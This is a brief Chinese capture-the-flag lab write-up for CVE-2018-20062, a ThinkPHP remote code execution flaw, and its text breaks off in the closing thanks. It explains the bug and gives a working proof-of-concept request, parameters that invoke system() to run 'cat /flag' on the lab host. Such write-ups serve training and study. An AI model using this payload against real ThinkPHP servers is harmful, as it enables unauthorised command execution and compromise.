春秋云境CVE-2018-20062(极速版)

1.阅读靶场介绍

这里我们可以得到的用信息就是

ThinkPHP5.0.23以前的版本中

获取method的方法中没有正确处理方法名, 导致攻击者可以调用Request类任意方法并构造利用链,从而导致RCE

2.启动靶场

我们会得到下面的页面

3.poc

构造url:https://eci-2ze41du84bufpbeytfn5.cloudeci1.ichunqiu.com:80/public/index.php?s=captcha

发送参数:

_method=__construct&filter\[\]=system&method=get&serverREQUEST_METHOD=cat /flag

到此,恭喜各位用攻克一个靶场了

期待下一篇文章的欢迎留言,博主会尽快更新

感谢你们宝贵的时